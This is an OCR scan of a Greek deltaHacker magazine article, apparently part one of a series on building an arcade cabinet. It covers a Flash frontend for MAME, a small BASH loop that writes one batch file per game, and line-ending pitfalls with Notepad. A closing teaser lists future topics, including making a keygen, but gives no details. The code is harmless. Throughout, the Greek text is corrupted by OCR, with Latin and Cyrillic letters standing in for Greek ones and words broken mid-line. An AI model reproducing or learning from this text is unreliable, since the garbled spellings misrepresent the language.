và κάθε фора το επιλεγμένο παιχνίδι. H λύση που βρήκα ἦταν απλἠ. 
Oa ἐφτιαχνα για κάθε παιχνίδι Eva batch file, To onoio θα εκτελούσε TO 
MAME µε την απαιτούμενη παράμετρο. Επομένως, ro frontend θα µπο- 
ρούσε апла va εκτελεἰ To batch file nou αντιστοιχεἰ στο επιλεγμένο nal- 
xvidi! Όμως, ποιος θα καθὀταν να γράψει σχεδὸν 200 batch files, yia ra 
παιχνίδια nou ἠθελα να βάλω στο arcade cabinet; Μα, φυσικά To Linux! 


Προγραμματίζοντας To frontend στο flash εἶχα δημιουργήσει δύο μεγὰ- 
λους πἰνακες. O ἑνας περιείχε τα ονόματα των παιχνιδιών και о ἄλλος 
τις αντίστοιχες παραμέτρους nou απαιτεί το МАМЕ για να ξεκινήσει το 
εκάστοτε παιχνίδι. Με ἆλλα λόγια, Eva μεγάλο µέρος της χαμαλοδουλειάς 
εἶχε ἡδη τελειώσει. Па να δημιουργήσω αυτόματα τα απαραίτητα batch 
file, αντἐγραψα τον nivaka pe TIG παραμέτρους σε Eva αρχείο απλού κει- 
μένου (plain text), ¿kava reboot και ξεκίνησα τον υπολογιστή σε Linux. 
Εκεἰ ἄνοιξα Eva τερματικὀ κι έφτιαξα Eva BASH script στα γρήγορα, µε то 
ακόλουθο περιεχόµενο: 


5. Υπάρχουν αρκετά προγράµµατα τρίτων κατασκευαστών nou “μεταγλωττίζουν” για To Linux εφαρμογές 
flash. Θα ἦταν όμως короїбїа апо μέρους µου αν μετὰ ro flash χρησιμοποιούσα Eva ακόµα єрпоріко εργαλείο, 
µόνο και µόνο για να βάλω στο τέλος Linux και να το παίζω υπέρμαχος των αποκλειστικἀ open source λύσεων! 
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#!/bin/bash 
mkdir -p ./games 
for i in $(cat gamelist); do 
echo "mameui32.exe "$i > ./games/$i.bat 
done 
exit 


Προφανώς, ὁταν ro εκτἐλεσα εἶχα φροντίσει va иєтоуонйсо) το αρχείο µε 
τα παιχνίδια σε "gamelist". To OKPINTAKI µου άρχισε να διαβάζει γραμμὴ 
προς γραµµή τη λίστα µε TIG παραμέτρους και va δημιουργεἰ το κατάλλη- 
Ло batch file για κάθε εγγραφή. Σε ελάχιστο χρόνο και µε ακόµα λιγότερο 
κόπο, εἶχα ξεμπερδέψει! Βέβαια, прёп να παραδεχτώὠ бт! στάθηκα και 
ολίγον τι τυχερός. H παράμετρος που δέχεται το МАМЕ για να ξεκινήσει 
κάποιο παιχνίδι εἶναι πάντοτε μία λέξη, χωρίς ειδικούς χαρακτήρες. Σε 
διαφορετικἠ περίπτωση θα ἐπρεπε να sixa φτιάξει Eva πιο EEUNVO και 
σύνθετο OKPINTAKI... 


Έχοντας ἑτοιμα και Ta batch files για κάθε παιχνίδι, το arcade cabinet πολύ 
λἰγο ελάχιστα and την υπέρτατη παιχνιδομηχανή! To frontend ολοκληρώ- 
θηκε σύντομα και ἡμουν ἐτοιμος να το εγκαταστήσω μαζί µε Ta Windows, 
στον υπολογιστή του arcade cabinet. Όμως, ακριβώς τὀτε κι εντελώς 
τυχαία, διαπίστωσα бт! οι παράμετροι yia την εκκἰνηση ορισμένων nai- 
Χνιδιὼν ἠταν λανθασμένες και, κατ’ επέκταση, τα αντίστοιχα batch files 
χρειάζονταν διόρθωση. EKEI χρειάστηκε λίγη προσοχἠ. O! OXETIKEG ENE- 
βάσεις ἐγιναν χειροκίνητα µέσα апо το WordPad κι όχι апо ro Notepad, 
το οποίο εξ ορισμού ανοίγει ra batch files. Βλέπετε, τα Windows χρησιμο- 
ποιούν διαφορετικούς χαρακτήρες yia τον τερματισμό των γραμμών στα 
αρχεία απλού κειµένου, σε σχέση µε TO Linux. Το WordPad αναγνωρίζει 
αυτή τη διαφορετικὀτητα και την αντιμετωπίζει χωρίς προβλήματα. Το 
Notepad ωστόσο, το αγαπημένο µου npóypaupa үа την επέμβαση σε ap- 
xeia plain text, μπερδεύεται και TEAIKG τα περιεχόμενα του αρχείου εἶναι 
διαφορετικά απ΄ αυτά που βλέπουμε στο παράθυρο του προγράμματος. 


Επιτέλους τέλος; 


Μετὰ ano λίγες Opec εἶχα εγκαταστήσει τα Windows και εἶχα προσθέσει TO 
frontend στην αυτόματη εκκίνηση του λειτουργικού. Όπως θα διαπίστωνα 
поло σύντομα, ὅμως, υπήρχαν KI Eva соро AM Aa προβλήµατα nou pe ne- 
ρίμεναν :S fi’ αυτά θα συζητήσουμε αναλυτικἁ στο δεύτερο και τελευταίο 
μέρος αυτού του αφιερώματος, oro deltaHacker 2 (Νοεμβρίου). Ως τότε, 
καλὲς κατασκευὲς και για οτιδήποτε σχετικὀ µπορείτε να ρωτάτε στο επἰ- 
опро site του περιοδικού, στη διεύθυνση http://deltahacker.gr. 


Χωρίς KEPUATODEKTN (μέρας 1/2) 
⁄///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


Εικόνα 18 
Εντάξει, µπορεί va 
μην EXEI TEÄEIONOI- 
ηθεί ακόμα, αλλά 
QUTO δεν HE εμπο- 
δίζει να κάνω µερι- 
KEG... δοκιμές! 


μάθετε πὼς va προστατεύετε 
τα npoypaápnpará σας ката της 
αντιγραφἠς 


г ÖEITE τις προχωρημένες 
δυνατότητες του pf firewall 


s OAOKANPWOTE την κατασκευή TOU 
ÖIKOU сас Arcade cabinet 


4 PTIAETE το δικὀ сас keygen 


...Kdi διαβάστε πολλά ἄλλα, EEAIPETIKÄA 
ενδιαφέροντα θέματα nou θα σας κρατήσουν 
ξάγρυπνους - για óAoUG TOUG состойс λόγους ;) 


talk2us@deltahacker.gr 


deltahacker.gr 


